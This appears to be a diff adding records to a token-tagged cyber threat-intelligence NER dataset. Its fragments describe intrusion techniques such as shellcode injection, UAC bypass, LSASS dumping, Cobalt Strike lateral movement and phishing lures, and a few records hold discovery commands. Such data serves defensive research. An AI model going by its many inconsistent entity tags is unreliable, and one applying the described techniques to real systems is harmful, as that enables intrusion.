+ "to", + "hinder", + "shellcode", + "detection." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "To", + "launch", + "the", + "shellcode,", + "the", + "loader", + "calls", + "ZwCreateThreadEx", + "to", + "create", + "a", + "new", + "suspended", + "injection", + "thread", + "hidden", + "from", + "debuggers", + "using", + "the", + "THREAD_CREATE_FLAGS_CREATE_SUSPENDED", + "(0x01)", + "and", + "THREAD_CREATE_FLAGS_HIDE_FROM_DEBUGGER", + "(0x4)", + "thread", + "creation", + "flags." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "by", + "redirecting", + "calls", + "to", + "the", + "Windows", + "Sleep", + "API", + "to", + "its", + "own", + "function" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "communicates", + "with", + "the", + "C2", + "server", + "specified", + "in", + "the", + "configuration", + "via", + "HTTP", + "or", + "HTTPS", + "POST", + "requests" + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "shared", + "with", + "the", + "C2", + "server", + "on", + "the", + "initial", + "check-in", + "request", + "(Figure", + "11)", + "for", + "encrypting", + "subsequent", + "data", + "communicated", + "between", + "the", + "agent", + "and", + "C2", + "server", + "with", + "AES-256-CTR." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "the", + "execution", + "of", + "the", + "downloaded", + "DLL", + "via", + "the", + "tool", + "rundll32.exe." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "performs", + "the", + "download", + "of", + "a", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerShell", + "script", + "that", + "downloads", + "and", + "executes", + "a", + "dropper" + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "B-Features", + "O", + "B-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "downloads", + "a", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "malware", + "dynamically", + "calls", + "the", + "API", + "NtAllocateVirtualMemory" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "AES", + "Cryptographic", + "Provider", + "from", + "WinCrypt", + "APIs" + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-SecTeam", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "the", + "API", + "Web", + "RESTful", + "that", + "provides", + "access", + "to", + "Microsoft", + "Cloud", + "service", + "resources." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "using", + "the", + "Microsoft", + "Graph", + "API" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "uses", + "the", + "Microsoft", + "Graph", + "API" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypted", + "using", + "the", + "RSA" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "The", + "malware", + "proceeds", + "to", + "de-obfuscate", + "strings", + "using", + "a", + "XOR", + "loop" + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "de-obfuscated", + "strings:" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "decrypted", + "through", + "an", + "AES-256-CBCdecryption", + "algorithm" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "decrypted" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "the", + "decrypted", + "content" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "code", + "in", + "the", + "injected", + "PE" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "injects", + "in", + "itself", + "a", + "new", + "PE", + "(Portable", + "Executable)", + "file," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "passes", + "the", + "execution", + "to", + "the", + "region", + "of", + "memory", + "in", + "which", + "the", + "copied", + "PE", + "is", + "allocated" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "imported", + "code", + "dynamically", + "calls", + "VirtualAlloc", + "to", + "allocate", + "a", + "new", + "region", + "of", + "memory", + "in", + "which", + "a", + "new", + "PE", + "file", + "is", + "copied." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "full", + "HTTP", + "request", + "to", + "make", + "the", + "first", + "connection", + "to", + "the", + "C&C" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "enumerating", + "the", + "child", + "files", + "in", + "the", + "check", + "OneDrive", + "subdirectory." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "execution", + "triggers", + "the", + "setting", + "of", + "the", + "following", + "registry", + "key" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "triggered", + "when", + "the", + "user", + "starts", + "the", + "presentation", + "mode", + "and", + "moves", + "the", + "mouse" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "triggered", + "when", + "the", + "user", + "starts", + "the", + "presentation", + "mode", + "and", + "moves", + "the", + "mouse" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "new", + "file,", + "again", + "with", + "a", + "JPEG", + "extension" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Contents", + "of", + "the", + ".img", + "file,", + "including", + "the", + "hidden", + "files" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "hiding", + "the", + "rest", + "of", + "its", + "files", + "from", + "the", + "user." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "run", + "the", + "subsequent", + "BAT", + "scripts" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "attacker’s", + "BAT", + "file", + "to", + "run" + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "BAT", + "script" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "BAT", + "file", + "(4.2)", + "to", + "be", + "run", + "on", + "logon", + "as", + "another", + "UI", + "shell" + ], + "ner_tags": [ + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "executes", + "another", + "BAT", + "script" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Some", + "variants", + "used", + "a", + "known", + "UAC", + "bypass", + "method", + "abusing", + "the", + "legitimate", + "fodhelper.exe" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "UAC", + "bypass", + "implementation" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "If", + "it", + "fails,", + "it", + "sets", + "in", + "the", + "registry" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Register", + "a", + "new", + "service" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "new", + "service", + "that", + "will", + "run", + "its", + "VBS", + "script", + "(4.1)", + "using", + "sc.exe." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "the", + "malicious", + "executable", + "to", + "unpack", + "itself." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "which", + "is", + "unpacked", + "only", + "when", + "run", + "with", + "a", + "unique", + "password,", + "allow", + "evading", + "traditional", + "signature-based", + "detection." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypting", + "and", + "running", + "the", + "ransomware" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "user", + "is", + "then", + "prompted", + "to", + "open", + "the", + "single", + "visible", + "shortcut", + "(2)", + "file." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "contains", + "obfuscated", + "VBA", + "scripts", + "or", + "a", + "binary", + "with", + "a", + "JPG", + "extension" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "trick", + "users", + "into", + "opening", + "the", + "malicious", + "attachments", + "in" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SecTeam", + "O" + ] + }, + { + "tokens": [ + "If", + "a", + "target", + "opens", + "the", + "malicious", + "attachment," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "using", + "three", + "possible", + "types", + "of", + "messages", + "to", + "try", + "to", + "get", + "a", + "target", + "to", + "open", + "the", + "email", + "and", + "malicious", + "attachment." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-SamFile", + "B-Purp" + ] + }, + { + "tokens": [ + "The", + "attachment,", + "if", + "opened," + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "spear", + "phishing", + "emails", + "pretending", + "to", + "be", + "from", + "financial", + "vendors", + "or", + "partners", + "to", + "trick", + "users", + "into", + "opening", + "the", + "malicious", + "attachments", + "in", + "the", + "emails." + ], + "ner_tags": [ + "I-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SecTeam", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "a", + "malicious", + "attachment", + "sent", + "via", + "phishing", + "emails" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way" + ] + }, + { + "tokens": [ + "the", + "malicious", + "attachment," + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "email", + "and", + "malicious", + "attachment." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "sends", + "emails", + "pretending", + "to", + "be", + "related", + "to", + "a", + "shipment", + "notice", + "for", + "the", + "target", + "which", + "contain", + "a", + "malicious", + "attachment." + ], + "ner_tags": [ + "B-Way", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Both", + "send", + "information", + "to", + "command", + "and", + "control", + "(C2)", + "servers" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "keylogging", + "every", + "tap" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "obtain", + "logs", + "of", + "the", + "infected", + "machine’s", + "keystrokes" + ], + "ner_tags": [ + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "exfiltrate", + "data", + "from", + "messaging", + "applications", + "such", + "as", + "WhatsApp", + "and", + "Viber" + ], + "ner_tags": [ + "B-SamFile", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "The", + "malware", + "can", + "deliver", + "payloads", + "from", + "the", + "command", + "and", + "control", + "(C2)", + "server" + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "vulnerability", + "allows", + "for", + "a", + "threat", + "actor", + "to", + "obtain", + "system", + "privileges" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "take", + "screenshots" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "version", + "of", + "CEIDPageLock", + "has", + "VMProtect,", + "which", + "makes", + "analysis", + "and", + "unpacking", + "difficult" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "then", + "proceeded", + "to", + "dump", + "credentials", + "from", + "LSASS." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actors", + "again", + "used", + "Get-System", + "to", + "elevate", + "and", + "then", + "dumped", + "LSASS." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "beacons", + "accessing", + "LSASS", + "on", + "multiple", + "occasions,", + "on", + "almost", + "every", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "threat", + "actor", + "injected", + "into", + "a", + "dllhost.exe", + "process" + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "which", + "is", + "then", + "injected", + "into", + "svchost", + "and", + "dllhost." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Process", + "injection", + "was", + "observed", + "during", + "the", + "intrusion" + ], + "ner_tags": [ + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "direct", + "Cobalt", + "Strike", + "processes", + "and", + "the", + "injected", + "processes" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "injecting", + "into", + "multiple", + "other", + "processes,", + "such", + "as", + "explorer.exe", + "and", + "svchost.exe,", + "to", + "execute", + "further", + "payloads." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "dumped", + "from", + "an", + "injection", + "into", + "the", + "SearchIndexer", + "process" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "was", + "achieved", + "by", + "transferring", + "a", + "Cobalt", + "Strike", + "DLL", + "over", + "SMB" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "the", + "SMB", + "lateral", + "transfer", + "of", + "one", + "of", + "the", + "Atera", + "Agent", + "MSI", + "installers", + "(1.msi)", + "used", + "to", + "gain", + "access", + "laterally", + "on", + "a", + "host", + "and", + "provide", + "persistence", + "for", + "later", + "access." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SMB", + "to", + "transfer", + "DLL's", + "into", + "the", + "ProgramData", + "folder", + "of", + "hosts", + "for", + "purposes", + "of", + "lateral", + "movement." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "and", + "executing", + "via", + "a", + "remote", + "service", + "on", + "another", + "workstation." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "using", + "a", + "batch", + "file", + "named", + "find.bat." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Windows", + "discovery", + "commands" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "using", + "a", + "batch", + "script" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "batch", + "script" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "basic", + "discovery", + "tasks", + "on", + "the", + "host", + "using", + "built", + "in", + "Windows", + "utilities." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\system32\\cmd.exe", + "/C" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\system32\\cmd.exe", + "/C" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\system32\\cmd.exe", + "/C" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\system32\\cmd.exe", + "/C" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\system32\\cmd.exe", + "/C" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\system32\\cmd.exe", + "/C" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "via", + "the", + "find.bat", + "batch", + "script." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "which", + "was", + "then", + "fed", + "to", + "a", + "batch", + "script" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "batch", + "file", + "contained", + "one", + "line," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "began", + "enumerating", + "the", + "network", + "using", + "native", + "Windows", + "binaries" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "via", + "the", + "interactive", + "shell" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "wrote", + "a", + "registry", + "run", + "key", + "for", + "persistence" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "used", + "a", + "registry", + "run", + "key", + "to", + "maintain", + "persistence." + ], + "ner_tags": [ + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "systeminfo" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "systeminfo" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\system32\\cmd.exe", + "/C", + "systeminfo" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ipconfig" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "ipconfig", + "/all" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "sending", + "new", + "emails", + "with", + "attached", + "xls", + "and", + "zip", + "files." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "document", + "came", + "in", + "via", + "email", + "in", + "the", + "form", + "of", + "a", + "zip", + "file", + "which", + "included", + "an", + "xls", + "file." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "B-Way", + "B-SamFile" + ] + }, + { + "tokens": [ + "The", + "emails", + "were", + "sent", + "through", + "various", + "compromised", + "email", + "accounts,", + "propagating", + "additional", + "malicious", + "xls", + "files" + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Using", + "the", + "remote", + "admin", + "tools" + ], + "ner_tags": [ + "O", + "O", + "I-Tool", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "the", + "threat", + "actor", + "deployed", + "several", + "Atera/Splashtop", + "remote", + "access", + "tools", + "across", + "the", + "environment", + "as", + "an", + "alternative", + "means", + "of", + "access", + "to", + "the", + "environment" + ], + "ner_tags": [ + "O", + "O", + "B-HackOrg", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "actors", + "used", + "Atera", + "and", + "Splashtop", + "remote", + "access", + "tools", + "on", + "two", + "compromised", + "hosts", + "during", + "the", + "intrusion." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "after", + "a", + "user", + "opened", + "an", + "Excel", + "document", + "and", + "enabled", + "macros." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "To", + "deobfuscate", + "the", + "document", + "the", + "tool", + "xlmdeobfuscator", + "was", + "used", + "with", + "the", + "following", + "output." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "After", + "deobfuscation" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "used", + "process", + "hollowing", + "to", + "launch", + "under", + "the", + "context", + "of", + "the", + "Dllhost.exe", + "process" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "the", + "following", + "URLs", + "are", + "hard", + "coded,", + "and", + "obfuscated" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "download", + "the", + "second", + "stage." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "malware", + "pulled", + "down", + "and", + "executed", + "a", + "Cobalt", + "Strike", + "payload", + "on" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "ran", + "another", + "round", + "of", + "discovery", + "activity", + "with", + "native", + "windows", + "utilities" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "cmd.exe", + "/C" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "“C:\\Windows\\System32\\cmd.exe”", + "CommandLine:", + "“C:\\Windows\\system32\\cmd.exe", + "/c" + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "cmd.exe", + "/C" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "C:\\Windows\\system32\\cmd.exe", + "/C", + "gpupdate" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\system32\\cmd.exe", + "/C", + "gpupdate" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\system32\\cmd.exe", + "/C", + "gpupdate" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\system32\\cmd.exe", + "/C", + "gpupdate" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "whoami.exe" + ], + "ner_tags": [ + "B-SamFile" + ] + }, + { + "tokens": [ + "cmd.exe", + "/C", + "whoami" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "The", + "threat", + "actors", + "continued", + "by", + "moving", + "laterally", + "to", + "the", + "domain", + "controllers", + "on", + "the", + "network", + "using", + "SMB", + "to", + "transfer", + "and", + "execute", + "a", + "Cobalt", + "Strike", + "Beacon" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actors", + "used", + "PsExec,", + "to", + "copy", + "and", + "execute", + "a", + "Cobalt", + "Strike", + "Beacon", + "DLL", + "on", + "most", + "of", + "the", + "systems", + "in", + "the", + "network." + ], + "ner_tags": [ + "O", + "O", + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "They", + "utilized", + "RDP," + ], + "ner_tags": [ + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "the", + "threat", + "actor", + "was", + "seen", + "establishing", + "RDP", + "connections" + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "was", + "used", + "to", + "enable", + "RDP," + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "remotedesktop", + "mode", + "=", + "enable", + "cmd" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RDP", + "connections", + "were", + "established", + "from", + "the", + "beachhead", + "host", + "to", + "systems", + "throughout", + "the", + "environment" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "details", + "of", + "the", + "RDP", + "session" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "the", + "initial", + "vector", + "used", + "by", + "the", + "threat", + "actor", + "was", + "a", + "zip", + "file,", + "which", + "included", + "a", + "malicious", + "JavaScript", + "file,", + "delivered", + "through", + "a", + "phishing", + "campaign." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "B-Way", + "B-SamFile", + "O", + "O", + "O", + "B-Org", + "B-OffAct" + ] + }, + { + "tokens": [ + "This", + "RDP", + "activity", + "was", + "being", + "proxied", + "through", + "the", + "IcedID", + "process", + "running", + "on", + "that", + "host,", + "to", + "a", + "remote", + "proxy", + "over", + "port", + "8080." + ], + "ner_tags": [ + "O", + "B-Org", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "in", + "an", + "effort", + "to", + "evade", + "any", + "detection", + "and", + "prevention", + "mechanisms,", + "they", + "disabled", + "Windows", + 